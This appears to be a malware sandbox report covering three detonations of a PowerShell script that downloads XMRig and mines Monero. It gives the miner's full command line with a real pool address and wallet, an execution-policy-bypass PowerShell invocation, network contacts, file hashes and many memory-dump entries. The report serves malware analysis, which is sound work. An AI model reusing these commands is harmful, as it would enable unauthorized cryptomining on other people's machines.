memory/4320-50-0x000001A471470000-0x000001A471490000-memory.dmp
memory/4320-51-0x000001A471490000-0x000001A4714B0000-memory.dmp
memory/4728-53-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/4320-52-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-54-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-55-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-56-0x000001A471470000-0x000001A471490000-memory.dmp
memory/4320-57-0x000001A471490000-0x000001A4714B0000-memory.dmp
memory/4320-58-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-59-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-60-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-61-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-62-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-63-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-64-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-65-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-66-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-67-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-68-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-69-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-70-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-71-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-72-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-73-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-74-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-75-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-76-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-77-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-78-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-79-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-80-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-81-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-82-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-83-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-84-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-85-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-86-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-87-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-88-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-89-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-90-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-91-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-92-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-93-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-94-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-95-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-96-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-97-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-98-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-99-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-100-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-101-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-102-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-103-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-104-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-105-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-106-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-107-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-108-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-109-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-110-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-111-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-112-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-113-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-114-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-115-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-116-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:35
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4948 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4948 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.192.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4948-5-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-4-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-6-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-7-0x000001DF1CE70000-0x000001DF1CE92000-memory.dmp
memory/4948-10-0x000001DF1D020000-0x000001DF1D096000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu5nku1r.ujj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4948-25-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/4948-48-0x000001DF1D0A0000-0x000001DF1D0B2000-memory.dmp
memory/4948-61-0x000001DF1D010000-0x000001DF1D01A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3264-90-0x000001BDC35F0000-0x000001BDC3610000-memory.dmp
memory/3264-91-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/4948-92-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/3264-93-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/4948-94-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp
memory/3264-95-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-96-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-97-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-98-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-99-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-100-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-101-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-102-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-103-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-104-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-105-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-106-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-107-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-108-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-109-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-110-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-111-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-112-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-113-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-114-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-115-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-116-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-117-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-118-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-119-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-120-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-121-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-122-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-123-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-124-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-125-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-126-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-127-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-128-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-129-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-130-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-131-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-132-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-133-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-134-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-135-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-136-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-137-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-138-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-139-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-140-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-141-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-142-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-143-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-144-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-145-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-146-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-147-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-148-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-149-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-150-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-151-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-152-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-153-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-154-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
memory/3264-155-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:36
Platform
win10v2004-20240508-en
Max time kernel
1684s
Max time network
1693s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/3452-0-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
memory/3452-1-0x000001F871280000-0x000001F8712A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmelzcau.ids.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3452-11-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-12-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-13-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-14-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-15-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
memory/3452-16-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/3452-17-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp
memory/4988-5-0x000001E9181F0000-0x000001E918212000-memory.dmp
memory/4988-8-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-9-0x000001E9183A0000-0x000001E918416000-memory.dmp
memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovvykolq.ems.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-61-0x000001E918380000-0x000001E91838A000-memory.dmp
memory/4988-48-0x000001E918520000-0x000001E918532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/796-90-0x000001DFE6B20000-0x000001DFE6B40000-memory.dmp
memory/796-91-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-92-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/4988-93-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp
memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/4988-96-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp
memory/796-97-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-98-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-99-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-100-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-101-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-102-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-103-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-104-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-105-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-106-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
memory/796-107-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp
